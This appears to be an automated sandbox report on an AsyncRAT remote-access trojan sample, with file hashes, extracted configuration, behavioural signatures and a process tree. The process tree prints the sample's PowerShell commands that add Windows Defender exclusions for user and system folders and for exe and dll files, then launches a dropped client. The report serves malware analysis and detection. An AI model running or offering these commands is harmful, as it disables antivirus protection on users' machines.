Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
145s -
max time network
128s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
04/01/2025, 03:56
Static task
static1
Behavioral task
behavioral1
Sample
JaffaCakes118_777a952f66baa34bde02c6075430a407.exe
Resource
win7-20240903-en
General
-
Target
JaffaCakes118_777a952f66baa34bde02c6075430a407.exe
-
Size
50KB
-
MD5
777a952f66baa34bde02c6075430a407
-
SHA1
e737be56566ab4f09abcf8988220f0517834851d
-
SHA256
6143e80d28f382ac57c41eeab350f8be0e88f642211ae1726538685eb0686aa9
-
SHA512
b707be23a181518d4a318101e8b5dc04dba26949cc2e743e50f054eefffdc0585a9a8502719f732d1855a841735771d43717ff4611b36d6a27598235f3023402
-
SSDEEP
768:f95geQCs3gOm6tiJSaZok3PRBX4fIOJaWm+YrEGMlc9OtwCvU062:fQe3sQMtBa+y5OsWm+Ygz20v
Malware Config
Extracted
asyncrat
0.5.7B
Default
127.0.0.1:6606
127.0.0.1:7707
127.0.0.1:8808
192.168.137.247:6606
192.168.137.247:7707
192.168.137.247:8808
AsyncMutex_6SI8OkPnk
-
delay
3
-
install
false
-
install_folder
%AppData%
Signatures
-
Asyncrat family
-
Async RAT payload 1 IoCs
resource yara_rule behavioral1/files/0x0008000000012102-1.dat family_asyncrat -
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
pid Process 2072 powershell.exe 2748 powershell.exe -
Executes dropped EXE 1 IoCs
pid Process 2388 AsyncClient.exe -
Loads dropped DLL 1 IoCs
pid Process 2336 cmd.exe -
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AsyncClient.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language JaffaCakes118_777a952f66baa34bde02c6075430a407.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2072 powershell.exe 2748 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2072 powershell.exe Token: SeDebugPrivilege 2748 powershell.exe -
Suspicious use of WriteProcessMemory 20 IoCs
description pid Process procid_target PID 2496 wrote to memory of 2008 2496 JaffaCakes118_777a952f66baa34bde02c6075430a407.exe 30 PID 2496 wrote to memory of 2008 2496 JaffaCakes118_777a952f66baa34bde02c6075430a407.exe 30 PID 2496 wrote to memory of 2008 2496 JaffaCakes118_777a952f66baa34bde02c6075430a407.exe 30 PID 2496 wrote to memory of 2008 2496 JaffaCakes118_777a952f66baa34bde02c6075430a407.exe 30 PID 2496 wrote to memory of 2336 2496 JaffaCakes118_777a952f66baa34bde02c6075430a407.exe 32 PID 2496 wrote to memory of 2336 2496 JaffaCakes118_777a952f66baa34bde02c6075430a407.exe 32 PID 2496 wrote to memory of 2336 2496 JaffaCakes118_777a952f66baa34bde02c6075430a407.exe 32 PID 2496 wrote to memory of 2336 2496 JaffaCakes118_777a952f66baa34bde02c6075430a407.exe 32 PID 2008 wrote to memory of 2072 2008 cmd.exe 34 PID 2008 wrote to memory of 2072 2008 cmd.exe 34 PID 2008 wrote to memory of 2072 2008 cmd.exe 34 PID 2008 wrote to memory of 2072 2008 cmd.exe 34 PID 2336 wrote to memory of 2388 2336 cmd.exe 35 PID 2336 wrote to memory of 2388 2336 cmd.exe 35 PID 2336 wrote to memory of 2388 2336 cmd.exe 35 PID 2336 wrote to memory of 2388 2336 cmd.exe 35 PID 2008 wrote to memory of 2748 2008 cmd.exe 36 PID 2008 wrote to memory of 2748 2008 cmd.exe 36 PID 2008 wrote to memory of 2748 2008 cmd.exe 36 PID 2008 wrote to memory of 2748 2008 cmd.exe 36
Processes
-
C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_777a952f66baa34bde02c6075430a407.exe"C:\Users\Admin\AppData\Local\Temp\JaffaCakes118_777a952f66baa34bde02c6075430a407.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2496 -
C:\Windows\SysWOW64\cmd.execmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2008 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2072
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"3⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c start C:\Users\Admin\AppData\Local\Temp\AsyncClient.exe2⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2336 -
C:\Users\Admin\AppData\Local\Temp\AsyncClient.exeC:\Users\Admin\AppData\Local\Temp\AsyncClient.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2388
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD57ca463dd54051ed0c761277784646a1f
SHA1fe82b6c8f1ba74ffb06aa8040ee92513018323e6
SHA25662e29935e8c5b48c703ce5f8e7d9fdb4ce87530b654d7d3eb85e1702c13ccef6
SHA512e65a75ce4102c642f047684760b3bb2ed401c545d0ca197847d0a701f465889e95f3bc9d2fbed2235b4f63773ddb888920f7a7ee88fe4cf4f4eec6402055d022
-
Filesize
45KB
MD53f127abdbfa5ac67e53626fd66b0158d
SHA12ccd44e4f9bee67efd6b41697b05e75e911deb3c
SHA25611fea91a8185b0f2d91e262d8dcb89046a77e257b90ebe63cb230c61c75b8456
SHA512c2bd2241d563e3f957448e8a6ace2b0c1920c3c7162386e014c91b1df1b6029cb06c13fed262690ebe9e8e07c3840f3455791202defedff000e96e433dc00c7f